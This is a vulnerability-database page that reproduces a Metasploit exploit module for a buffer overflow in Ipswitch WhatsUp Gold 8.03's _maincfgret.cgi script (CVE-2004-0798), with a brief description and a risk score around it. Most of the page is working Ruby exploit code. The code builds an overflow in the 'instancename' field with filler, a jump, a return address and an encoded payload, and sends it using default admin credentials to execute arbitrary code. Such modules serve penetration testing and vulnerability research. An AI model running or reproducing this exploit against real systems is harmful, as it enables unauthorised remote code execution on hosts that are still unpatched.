Ipswitch WhatsUp Gold 8.03 Buffer Overflow

🗓️ 01 Jul 2014 00:00:00Reported by RootType

This module exploits a buffer overflow in IPswitch WhatsUp Gold 8.03. An attacker can overflow a buffer and execute arbitrary code on the system by posting a long string for the value of 'instancename' in the _maincfgret.cgi script


                                                ##
# $Id: ipswitch_wug_maincfgret.rb 9820 2010-07-14 13:59:38Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require &#39;msf/core&#39;

class Metasploit3 &#60; Msf::Exploit::Remote
	Rank = GreatRanking

	# [*] x.x.x.x WhatsUp_Gold/8.0 ( 401-Basic realm=&#34;WhatsUp Gold&#34; )
	HttpFingerprint = { :pattern =&#62; [ /WhatsUp/ ] }

	include Msf::Exploit::Remote::HttpClient

	def initialize(info = {})
		super(update_info(info,
			&#39;Name&#39;           =&#62; &#39;Ipswitch WhatsUp Gold 8.03 Buffer Overflow&#39;,
			&#39;Description&#39;    =&#62; %q{
					This module exploits a buffer overflow in IPswitch WhatsUp Gold 8.03. By
				posting a long string for the value of &#39;instancename&#39; in the _maincfgret.cgi
				script an attacker can overflow a buffer and execute arbitrary code on the system.
			},
			&#39;Author&#39;         =&#62; [ &#39;MC&#39; ],
			&#39;License&#39;        =&#62; MSF_LICENSE,
			&#39;Version&#39;        =&#62; &#39;$Revision: 9820 $&#39;,
			&#39;References&#39;     =&#62;
				[
					[&#39;CVE&#39;, &#39;2004-0798&#39;],
					[&#39;OSVDB&#39;, &#39;9177&#39;],
					[&#39;BID&#39;, &#39;11043&#39;],
				],
			&#39;DefaultOptions&#39; =&#62;
				{
					&#39;EXITFUNC&#39; =&#62; &#39;thread&#39;,
				},
			&#39;Privileged&#39;     =&#62; true,
			&#39;Payload&#39;        =&#62;
				{
					&#39;Space&#39;    =&#62; 500,
					&#39;BadChars&#39; =&#62; &#34;\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c&#34;,
					&#39;PrependEncoder&#39; =&#62; &#34;\x81\xc4\xff\xef\xff\xff\x44&#34;,
				},
			&#39;Platform&#39;       =&#62; &#39;win&#39;,
			&#39;Targets&#39;        =&#62;
				[
					[ &#39;WhatsUP Gold 8.03 Universal&#39;, { &#39;Ret&#39; =&#62; 0x6032e743 } ], # whatsup.dll
				],
			&#39;DefaultTarget&#39;  =&#62; 0,
			&#39;DisclosureDate&#39; =&#62; &#39;Aug 25 2004&#39;))

		register_options(
			[
				Opt::RPORT(80),
				OptString.new(&#39;HTTPUSER&#39;, [ false, &#39;The username to authenticate as&#39;, &#39;admin&#39;]),
				OptString.new(&#39;HTTPPASS&#39;, [ false, &#39;The password to authenticate as&#39;, &#39;admin&#39;]),
			], self.class )
	end

	def exploit
		c = connect

		num = rand(65535).to_s
		user_pass = &#34;#{datastore[&#39;HTTPUSER&#39;]}&#34; + &#34;:&#34; + &#34;#{datastore[&#39;HTTPPASS&#39;]}&#34;

		req   = &#34;page=notify&origname=&action=return&type=Beeper&instancename=&#34;
		req  &#60;&#60; rand_text_alpha_upper(811, payload_badchars) + &#34;\xeb\x06&#34;
		req  &#60;&#60; make_nops(2) + [target.ret].pack(&#39;V&#39;) + make_nops(10) + payload.encoded
		req  &#60;&#60; &#34;&beepernumber=&upcode=&#34; + num + &#34;*&downcode=&#34;+ num + &#34;*&trapcode=&#34; + num + &#34;*&end=end&#34;

		print_status(&#34;Trying target %s...&#34; % target.name)
		res = send_request_cgi({
			&#39;uri&#39;          =&#62; &#39;/_maincfgret.cgi&#39;,
			&#39;method&#39;       =&#62; &#39;POST&#39;,
			&#39;content-type&#39; =&#62; &#39;application/x-www-form-urlencoded&#39;,
			&#39;data&#39;         =&#62; req,
			&#39;headers&#39;      =&#62;
			{
				&#39;Authorization&#39; =&#62; &#34;Basic #{Rex::Text.encode_base64(user_pass)}&#34;
			}
		}, 5)

		handler
	end

end

01 Jul 2014 00:00Current

7.1High risk

Vulners AI Score7.1